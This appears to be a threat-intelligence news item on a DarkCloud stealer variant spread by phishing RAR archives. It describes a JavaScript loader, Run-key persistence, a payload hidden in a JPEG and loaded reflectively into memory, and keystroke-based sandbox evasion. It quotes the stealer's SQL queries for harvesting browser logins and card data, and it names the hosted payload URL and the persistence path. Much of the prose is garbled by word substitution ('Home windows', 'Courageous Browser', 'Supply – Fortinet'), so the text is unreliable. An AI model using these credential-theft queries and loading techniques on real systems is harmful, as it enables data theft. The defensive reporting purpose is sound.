A complicated new variant of the DarkCloud data stealer has emerged within the cyberthreat panorama, focusing on Home windows customers by fastidiously crafted phishing campaigns designed to reap delicate credentials and monetary data.
This fileless malware variant represents a major evolution in stealer expertise, using superior evasion strategies and multi-stage deployment mechanisms that make detection notably difficult for conventional safety options.
The marketing campaign begins with misleading phishing emails containing RAR archives disguised as pressing enterprise quotes.
When victims extract and execute the JavaScript file named “Quote #S_260627.js,” the malware initiates a posh an infection chain that finally deploys the DarkCloud payload with out leaving conventional file signatures on the compromised system.
New DarkCloud variant an infection chain (Supply – Fortinet)
The assault vector leverages social engineering ways, presenting seemingly professional enterprise communications that immediate customers to open malicious attachments.
Fortinet analysts recognized this new DarkCloud variant in early July 2025, noting its subtle use of course of hollowing strategies and fileless deployment methods.
The researchers noticed that this marketing campaign particularly targets saved login credentials, cost card data, and speak to lists saved throughout a number of in style purposes together with internet browsers, electronic mail purchasers, and FTP software program.
The malware demonstrates explicit sophistication in its knowledge harvesting capabilities, focusing on main internet browsers reminiscent of Google Chrome, Microsoft Edge, Mozilla Firefox, and Courageous Browser.
It executes particular SQL queries towards browser databases to extract delicate data: SELECT origin_url, username_value, password_value FROM logins for credential harvesting and SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards for monetary knowledge extraction.
Superior Persistence and Evasion Mechanisms
The DarkCloud variant employs a number of subtle strategies to keep up persistence and evade detection on contaminated techniques.
Upon profitable execution, the malware establishes persistence by copying the preliminary JavaScript file to C:UsersPublicDownloadsedriophthalma.js and creating an auto-run registry entry below HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun.
View of the disguised JPEG file (Supply – Fortinet)
This ensures the malware mechanically executes throughout system startup, sustaining its presence throughout reboots.
Essentially the most notable technical development on this variant lies in its fileless deployment technique.
The malware downloads a seemingly innocuous JPEG picture from archive.org/obtain/universe-1733359315202-8750/universe-1733359315202-8750.jpg that really comprises an encrypted .NET DLL embedded inside its pixel knowledge.
The PowerShell part extracts this hidden payload by parsing the picture file and loading the meeting instantly into reminiscence utilizing [Reflection.Assembly]::Load() strategies.
To evade automated evaluation techniques, DarkCloud implements anti-sandbox strategies that monitor consumer interplay by the GetAsyncKeyState() API.
The malware stays dormant till it detects precise keyboard or mouse exercise, successfully bypassing sandboxed environments that lack real consumer interplay.
This behavioral evaluation evasion represents a major problem for automated safety testing platforms.
Equip your SOC with full entry to the newest risk knowledge from ANY.RUN TI Lookup that may Enhance incident response -> Get 14-day Free Trial
